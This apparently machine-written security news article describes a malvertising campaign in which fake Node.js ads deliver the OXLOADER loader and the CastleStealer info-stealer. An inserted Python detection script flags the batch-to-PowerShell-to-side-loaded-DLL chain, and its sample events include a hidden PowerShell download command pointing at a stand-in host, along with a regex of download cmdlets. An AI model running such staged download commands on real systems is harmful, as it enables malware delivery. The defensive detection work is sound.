Ethical Hacking News

New OXLOADER Loader Exploits Malicious Google Ads to Deliver CastleStealer Malware


Researchers have uncovered a new campaign that uses malicious Google Ads to deliver the CastleStealer malware, exploiting multiple layers of obfuscation to evade detection. The threat actor is believed to be a Russian-speaking entity with financial motivations.

  • The new campaign leverages malicious Google Ads to deliver a highly sophisticated piece of malware called CastleStealer.
  • The malware uses OXLOADER, a previously unreported malware loader, which is capable of executing the CastleStealer payload with great precision and stealth.
  • The threat actor behind this campaign is likely a Russian-speaking entity with a financial motivation for their actions.
  • The attack begins when an unsuspecting user enters a query on Google and is redirected to a fake website that fronts malicious advertisements.
  • CastleStealer is a .NET information stealer that can steal sensitive information from unsuspecting users.



The world of cybersecurity is constantly evolving, and it's becoming increasingly difficult for even the most seasoned experts to keep up with the latest threats. Recently, a new campaign has been uncovered that leverages malicious Google Ads as a means to deliver a highly sophisticated piece of malware known as CastleStealer. This malicious software (malware) is designed to steal sensitive information from unsuspecting users, making it an extremely concerning threat.

The campaign in question involves the use of a previously unreported malware loader called OXLOADER, which is capable of executing the CastleStealer payload with great precision and stealth. Researchers have determined that this malware loader is highly engineered, utilizing multiple obfuscation layers to evade detection by traditional security software.

According to Elastic Security Labs, the threat actor behind this campaign is likely a Russian-speaking entity with a financial motivation for their actions. This conclusion was drawn from the fact that explicit exclusions were made to prevent the malware from infecting machines located in certain regions of the Commonwealth of Independent States (CIS). Furthermore, researchers have identified the use of unique staging techniques and anti-VM measures, which suggest deliberate engineering choices aimed at evading analysis.

The attack begins when an unsuspecting user enters a query such as "lts version of node.js" on Google. The search result redirects to a fake website ("node-js[.]prentiva99[.]info") presented under the name "ВОЛОДИМИР ТЕРЕЩЕНКО," purportedly based in Ukraine. This setup serves as a front for malicious advertisements that, upon clicking, trigger the execution of a batch script hosted on Storj, a decentralized, open-source cloud storage platform.

This batch script then proceeds to display a bogus installation wizard user interface while stealthily downloading and executing OXLOADER via PowerShell commands, which triggers a Windows User Account Control (UAC) prompt. The attack takes advantage of DLL side-loading to launch a rogue DLL that decrypts and executes the CastleStealer payload, leveraging control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA) techniques to evade static detection.
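As an added illustration (not code from the article or from Elastic Security Labs), the following Python correlates constructed, Sysmon-style process-creation and image-load events to flag the delivery chain described above: a batch script launching PowerShell with a download command, followed by a descendant process loading a DLL from a user-writable directory, which is the side-loading pattern. The event field names, the download-cmdlet patterns and the sample paths are assumptions, not indicators from the campaign.

```python
import re

# Assumed PowerShell download indicators (not from the article); extend as needed.
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\bcurl\b", re.I)
# Directories a standard user can write to; a DLL loaded from here beside an EXE is suspicious.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")

# Constructed Sysmon-style events (id 1 = process create, id 7 = image load); not real telemetry.
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\node-lts-setup.bat"'},
    {"id": 1, "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c Invoke-WebRequest http://example.invalid/x -OutFile $env:TEMP\ox\signed.exe"},
    {"id": 1, "pid": 102, "ppid": 101, "image": r"C:\Users\u\AppData\Local\Temp\ox\signed.exe",
     "cmdline": "signed.exe"},
    {"id": 7, "pid": 102, "image": r"C:\Users\u\AppData\Local\Temp\ox\signed.exe",
     "loaded": r"C:\Users\u\AppData\Local\Temp\ox\helper.dll"},
    {"id": 1, "pid": 200, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def ancestors(pid, parents):
    """Yield the parent chain of pid, nearest first; parents maps pid -> ppid."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
        yield pid


def detect(events):
    """Return alert strings for the batch -> PowerShell download -> user-path DLL load chain."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    parents = {p: e["ppid"] for p, e in procs.items()}
    # Stage 0: cmd.exe instances whose command line runs a .bat file.
    batch_pids = {p for p, e in procs.items()
                  if e["image"].lower().endswith("cmd.exe") and ".bat" in e["cmdline"].lower()}
    staged, alerts = set(), []
    # Stage 1: PowerShell with a download command that descends from such a batch script.
    for p, e in procs.items():
        if (e["image"].lower().endswith("powershell.exe") and DOWNLOAD_RE.search(e["cmdline"])
                and batch_pids.intersection(ancestors(p, parents))):
            staged.add(p)
            alerts.append(f"pid {p}: PowerShell download launched from a batch script")
    # Stage 2: a descendant of stage 1 loads a DLL from a user-writable path (side-loading pattern).
    for e in events:
        if (e["id"] == 7 and any(d in e["loaded"].lower() for d in USER_WRITABLE)
                and staged.intersection(ancestors(e["pid"], parents))):
            alerts.append(f"pid {e['pid']}: DLL loaded from user-writable path {e['loaded']} after staged download")
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The unrelated `cmd.exe /c dir` process produces no alert, and removing the PowerShell event breaks the chain so the DLL load alone is not flagged.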

CastleStealer is a .NET information stealer recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool. The engineering behind OXLOADER suggests that the family of malware is worth monitoring, given its ability to utilize complex obfuscation layers and unique staging techniques to evade analysis.

It's essential for users and organizations alike to be vigilant in the current threat landscape. Staying informed about emerging threats like CastleStealer and understanding how they operate can help mitigate the risks associated with their deployment.



Related Information:
  • https://www.ethicalhackingnews.com/articles/New-OXLOADER-Loader-Exploits-Malicious-Google-Ads-to-Deliver-CastleStealer-Malware-ehn.shtml

  • https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html


Published: Mon Jun 22 08:31:51 2026 by llama3.2 3B Q4_K_M

© Ethical Hacking News. All rights reserved.